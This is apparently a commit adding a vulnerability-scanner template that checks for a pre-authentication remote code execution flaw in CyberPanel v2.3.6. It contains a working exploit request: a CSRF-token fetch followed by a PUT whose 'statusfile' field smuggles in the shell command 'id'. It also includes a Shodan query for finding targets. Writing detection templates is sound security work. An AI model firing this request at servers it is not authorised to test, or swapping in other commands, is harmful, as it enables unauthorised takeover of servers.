Create cyberpanel-rce.yaml (CyberPanel v2.3.6 Pre-Auth Remote Code Execution 🔥 ) (#11103)

* Create cyberpanel-rce.yaml

* Update cyberpanel-rce.yaml

---------

Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>

http/vulnerabilities/other/cyberpanel-rce.yaml

@@ -0,0 +1,58 @@
+id: cyberpanel-rce
+
+info:
+  name: CyberPanel v2.3.6 Pre-Auth Remote Code Execution
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    CyberPanel v2.3.6 has a critical vulnerability that allows remote attackers to execute arbitrary commands on the server without prior authentication.
+  impact: Attackers can exploit this vulnerability by crafting malicious requests that bypass authentication controls, allowing them to inject and execute arbitrary commands on the underlying server.
+  reference:
+    - https://community.cyberpanel.net/t/cyberpanel-2-1-remote-code-execution-rce/31760
+    - https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce
+  metadata:
+    verified: true
+    max-request: 2
+    shodan-query: html:"CyberPanel"
+  tags: cyberpanel,rce,intrusive
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        PUT /dataBases/upgrademysqlstatus HTTP/1.1
+        Host: {{Hostname}}
+        X-CSRFToken: {{csrftoken}}
+        Content-Type: application/json
+        Referer: {{RootURL}}
+        Cookie: csrftoken={{csrftoken}}
+
+        {"statusfile":"/dev/null; id; #","csrftoken":"{{csrftoken}}"}
+
+    extractors:
+      - type: regex
+        part: header
+        name: csrftoken
+        internal: true
+        group: 1
+        regex:
+          - csrftoken=([A-Za-z0-9]+)
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "uid="
+          - "error_message"
+          - "requestStatus"
+        condition: and
+
+      - type: status
+        status:
+          - 200